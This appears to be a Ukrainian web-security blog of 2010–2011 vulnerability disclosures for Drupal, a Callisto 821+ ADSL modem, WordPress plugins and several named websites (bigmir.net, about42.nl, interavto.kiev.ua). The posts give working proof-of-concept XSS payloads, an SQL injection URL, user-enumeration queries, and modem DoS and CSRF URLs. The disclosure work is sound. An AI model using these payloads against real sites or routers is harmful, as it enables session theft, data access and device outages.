Websecurity - Веб безпека

12.04.2011

У серпні, 16.08.2010, я знайшов Cross-Site Scripting та Abuse of Functionality уразливості в Drupal. Які я виявив під час секюріті аудиту на одному сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про Abuse of Functionality уразливості в Drupal.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

24.06.2011

XSS:

При доданні або зміні даних в будь-яких внутрішніх формах (додання/зміна поста і т.д.) можна провести persistent XSS атаку. XSS код виконається при відвідуванні сторінки редагування (зміна поста і т.д.). Атака проводиться на будь-які форми з включеним FCKeditor/CKEditor (які дуже поширені на сайтах на Drupal). Подібна атака може бути проведена і на форми з TinyMCE - про подібні уразливості в PHP-Nuke через TinyMCE я вже писав.

Для атаки необхідно в поле форми в режимі “Source” вказатиь:
<img onerror="alert(document.cookie)" src="1" />
Також можна відправити POST запит з токеном і атакуючим кодом в параметрі body.

Атака може бути проведена тільки на залогіненого користувача сайта, який є власником даного акаунта, або адміна сайта. Тобто або користувача сам збереже атакуючий код і заманить на цю сторінку адміна, або, з врахування анти-CSRF захисту, через reflected XSS уразливість буде отриманий токен і на користувача або адміна буде проведена persistent XSS атака.

Abuse of Functionality:

При спеціальному запиту до пошуку по користувачам можна визначити логіни всіх користувачів на сайті.

http://site/search/user/%25
http://site/search/user_search/%25

В rss-фідах сайта, зокрема в основному rss-фиді (http://site/rss.xml) можна визначити логині користувачів на сайті, матеріали яких виводяться в даному фіді.

Уразливі Drupal 6.22 та попереднії версії (перевірено в Drupal 6.17). Враховуючи, що розробники не виправили дані уразливості, то версії 7.x також повинні бути вразливими.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

Окрім раніше згаданих сторінок 8, 10, 12, 95 і 96 для налаштування портів, в диапазоні 1..196 існує чимало інших розділів (де є форма з параметрами, яка вразлива до CSRF). Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

Зокрема в розділі Ip App Port Configuration (http://192.168.1.1/configuration/ports.html?194), останньому робочому розділі, через CSRF можлива зміна параметрів IP App порта.

В розділі Advanced Ip App Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?194) через CSRF можлива зміна параметрів IP App порта.

XSS:

Окрім раніше згаданих сторінок 8, 10, 12, 95 і 96 для налаштування портів, в диапазоні 1..196 існує чимало інших розділів (де є форма з параметрами, в якій є persistent XSS уразливості). Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

Зокрема в розділі Ip App Port Configuration (http://192.168.1.1/configuration/ports.html?194), останньому робочому розділі, у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced Ip App Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?194) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В даній добірці уразливості в веб додатках:

• HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code (деталі)
• SQL Injection in HTML-EDIT CMS (деталі)
• Path disclosure in Habari (деталі)
• Multiple XSS Vulnerabilities in Openfire 3.6.4 Administrative Section (деталі)
• XSS vulnerability in Habari (деталі)
• Multiple CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section (деталі)
• XSS in HTML-EDIT CMS (деталі)
• LinkSys BEFSR41 Multiple Stored Xss (деталі)
• Path disclosure in HTML-EDIT CMS (деталі)
• XSS vulnerability in ImpressCMS (деталі)

У червні, 25.06.2010, а також додатково 17.06.2011, я знайшов Brute Force та Cross-Site Scripting уразливості на проекті http://about42.nl. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на about42.nl.

Brute Force:

http://about42.nl/www/showinfo.php

XSS:

POST запит на сторінці http://about42.nl/www/showinfo.php

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі UserID.

GET/POST запит на сторінці http://about42.nl/www/showheaders.php
<script>alert(document.cookie)</script>В HTTP заголовках: User-Agent, Accept, Accept-Language, Accept-Encoding, Accept-Charset, Referer, а також майже в будь-яких довільних заголовках.

Дані XSS атаки через заголовки можна провести через флеш, про що я писав в статті Відправка серверних заголовків в Flash. Але враховуючи те, що на сайті немає crossdomain.xml, то атака не спрацює в нових версіях флеш-плагіна (тільки в старих версіях), про що я писав у даній статті.

Тому потрібно буде скористатися іншими методами, зокрема для заголовка User-Agent, про що я розповідав в статті XSS атаки через заголовок User-Agent. Деякі з зазначених методів підійдуть і для інших заголовків.

13.10.2010

У червні, 27.06.2010, я знайшов нову Cross-Site Scripting уразливість на сайті http://bigmir.net, обійшови їхній WAF (що я вже робив багато разів). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на dnevnik.bigmir.net.

Детальна інформація про уразливість з’явиться пізніше.

22.06.2011

XSS:

http://passport.bigmir.net/logout?url=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==

Дана уразливість вже виправлена. І як і в більшості випадків з Бігміром, зробили вони це втихаря (після мого повідомлення), не подякувавши мені. А варто не забувати дякувати людям. При цьому виправлений лише даний вектор атаки, але можливі інші вектори (при цьому потрібно буде обійти їхній WAF).

Зазначу, що в даному функціоналі є також Redirector уразливість, про яку я писав в 2008 році, і яка досі не виправлена.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Denial of Service, Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести DoS, CSRF або XSS атаку.

DoS:

http://192.168.1.1/configuration/ports.html?120

При даному запиті відбувається рестарт модема.

CSRF:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі RIP Port Configuration (http://192.168.1.1/configuration/ports.html?10) через CSRF можлива зміна параметрів RIP порта.

В розділі Advanced RIP Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?10) через CSRF можлива зміна параметрів RIP порта.

В розділі Bridge Port Configuration (http://192.168.1.1/configuration/ports.html?12) через CSRF можлива зміна параметрів Bridge порта.

В розділі Advanced Bridge Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?12) через CSRF можлива зміна параметрів Bridge порта.

XSS:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі RIP Port Configuration (http://192.168.1.1/configuration/ports.html?10) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced RIP Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?10) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Bridge Port Configuration (http://192.168.1.1/configuration/ports.html?12) в деяких текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced Bridge Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?12) в деяких текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В даній добірці уразливості в веб додатках:

• Multiple XSS injection vulnerabilities and a offsite redirection flaw within HP System Management Homepage (Insight Manager) (деталі)
• SQL injection in Hycus CMS (деталі)
• HP Insight Diagnostics Online Edition Running on Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
• SQL injection in Hycus CMS (деталі)
• XSS in Sybase Afaria (деталі)
• SQL injection in Hycus CMS (деталі)
• Security update for libxml2 (деталі)
• Path disclosure in GetSimple CMS (деталі)
• Citrix Access Gateway Command Injection Vulnerability (деталі)
• XSS vulnerability in Habari (деталі)

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Denial of Service, Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести DoS, CSRF або XSS атаку.

DoS:

При відправці GET або POST запитів в розділах Ethernet Port Configuration (http://192.168.1.1/configuration/ports.html?95) і Advanced Ethernet Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?95) вібдувається довготривалий DoS модему. В моїх дослідженнях модем не працював до 16 годин (доки сам не перезавантажився). Єдине, що в даному випадку можна зробити - це вручну перезавантажити модем (шляхом його виключення-включення).

http://192.168.1.1/configuration/ports.html/edit?EmWeb_ns:vim:6=95&EmWeb_ns:vim:2.ImPorts.ethernet:MAC=00:01:38:83:6f:24
http://192.168.1.1/configuration/ports_advanced.html/edit?EmWeb_ns:vim:6=95&EmWeb_ns:vim:2.ImPorts.ethernet:MAC=00:01:38:83:6f:24

Дані атаки спрацюють при дефолтній конфігурації модема (коли він в режимі bridge) і не спрацюють коли конфігурація змінена (коли він в режимі router).

CSRF:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports.html?8) через CSRF можлива зміна параметрів Upstream If і Forward All.

В розділі Advanced IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?8) через CSRF можлива зміна параметрів Upstream If і Forward All.

XSS:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports.html?8) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?8) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

21.07.2010

У липні, 01.07.2010, я знайшов SQL Injection уразливість на проекті http://interavto.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.06.2011

SQL Injection:

http://interavto.kiev.ua/index.php?content_id=-1%20or%20version()%3E4

Зараз сайт не працює. Замість виправлення дірок (цієї та багатьох інших, що є в движку сайта), адміни вирішили закрити його.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wysi та Events Manager Extended і в самому WordPress. Для котрих з’явилися експлоіти. Wysi - це плагін для заміні вбудованого WYSIWYG-редактора на новий, Events Manager Extended - це плагін для управління та відображення подій. А також витік логінів в WP, що стосуються версій WP 2.х і 3.х.

• WordPress Wysi 0.0.2 Shell Upload (деталі)
• WordPress Events Manager 3.1.2 SQL Injection (деталі)
• WordPress User IDs and User Names Disclosure (деталі)

Вищезгадана уразливість в движку була виправлена в WordPress 3.1.3 (причому неякісно) і як я вже зазначав, вона відома вже багато років. Ця дірка пов’язана з шаблоном автора, через який можна проводити ще одну атаку для визначення логінів, про що я згадував в статті визначення логінів в WordPress. Таких уразливостей чимало в WP.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.